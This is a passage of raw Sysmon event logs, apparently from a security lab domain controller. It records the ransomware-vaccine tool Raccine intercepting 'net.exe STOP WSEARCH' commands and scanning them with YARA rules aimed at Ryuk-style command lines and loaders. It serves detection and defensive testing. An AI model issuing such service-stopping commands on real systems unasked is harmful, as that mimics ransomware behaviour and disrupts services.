Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002246844Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.677{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002246776Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.635{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246774Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.629{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002246755Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.620{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002246688Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.578{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246687Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.578{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+5894|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246684Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.572{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002246665Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.562{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002246595Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.505{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246593Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.503{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-ED08-010000000E02}7320C:\Windows\system32\net.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+57ef|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000002246592Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.500{9DBE88B5-5575-61B2-EC08-010000000E02}4380ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac811D.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246591Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.493{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-ED08-010000000E02}7320C:\Windows\system32\net.exe0x1c3aC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+c6f00|C:\Windows\System32\KERNELBASE.dll+c6e21|C:\Program Files\Raccine\Raccine.exe+1876|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246585Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.492{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-ED08-010000000E02}7320C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+1848|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002246584Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.493{9DBE88B5-5575-61B2-ED08-010000000E02}7320C:\Windows\System32\net.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet.exe"C:\Windows\system32\net.exe" STOP WSEARCHC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=C6B6DAA95CEA707F8D986D933E4A9596,SHA256=FDDC5F29F779A6EF73D70A2C551397FDEE63F549F2BCE4FE6A7AEEDC11F4F72E,IMPHASH=C41B15F592DE4589047CE5119CE87468{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002246583Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.483{9DBE88B5-3AAE-61AE-0EA8-000000000E02}68046848C:\Windows\system32\conhost.exe{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246578Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.480{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002246577Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.480{9DBE88B5-3AAE-61AE-0DA8-000000000E02}67766968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca360024(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97a002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c9803a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97d665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3b9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c8363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c78d5(wow64) 154100x80000000000000002246576Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.480{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe1.4.2.0 BETAA Simple Ransomware Vaccine - see https://github.com/Neo23x0/RaccineRaccineRaccineRaccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCHC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=287F6CFBFFD83B75A0F8F749B0F636F3,SHA256=E5364CE4BD1814E003215BFF10DD2F191C33199260DFD2688D4F6CCE4A7C75B8,IMPHASH=B9673CBFF2550CFBFA1668EF53412C24{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002245616Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:08.884{9DBE88B5-5543-61B2-C308-010000000E02}5464ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBC08.tmpMD5=779F5AB5327FC99736B1988354F6553D,SHA256=829218A94D9D3DCC375F7D9CC3C37D5A17F8DB233048893BBB47F03C17D85240,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245611Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.542{9DBE88B5-5543-61B2-DB08-010000000E02}2086264C:\Program Files\Raccine\yara64.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\yara64.exe+8503f|C:\Program Files\Raccine\yara64.exe+7ce90|C:\Program Files\Raccine\yara64.exe+73b07|C:\Program Files\Raccine\yara64.exe+7303c|C:\Program Files\Raccine\yara64.exe+17c129|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245608Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.530{9DBE88B5-5543-61B2-DC08-010000000E02}76487608C:\Windows\system32\conhost.exe{9DBE88B5-5543-61B2-DB08-010000000E02}208C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245602Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.519{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5543-61B2-DB08-010000000E02}208C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245601Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.518{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-DB08-010000000E02}208C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+116f5|C:\Program Files\Raccine\Raccine.exe+6156|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002245600Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.519{9DBE88B5-5543-61B2-DB08-010000000E02}208C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\in-memory\gen_loaders.yar" 6776 -d MemoryScan=1 -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002245597Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.503{9DBE88B5-5543-61B2-DA08-010000000E02}73727960C:\Windows\system32\conhost.exe{9DBE88B5-5543-61B2-D908-010000000E02}6276C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245590Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.492{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5543-61B2-D908-010000000E02}6276C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245589Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.492{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-D908-010000000E02}6276C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002245588Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.492{9DBE88B5-5543-61B2-D908-010000000E02}6276C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ryuk-commandlines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBC08.tmp -d Name="net.exe" -d 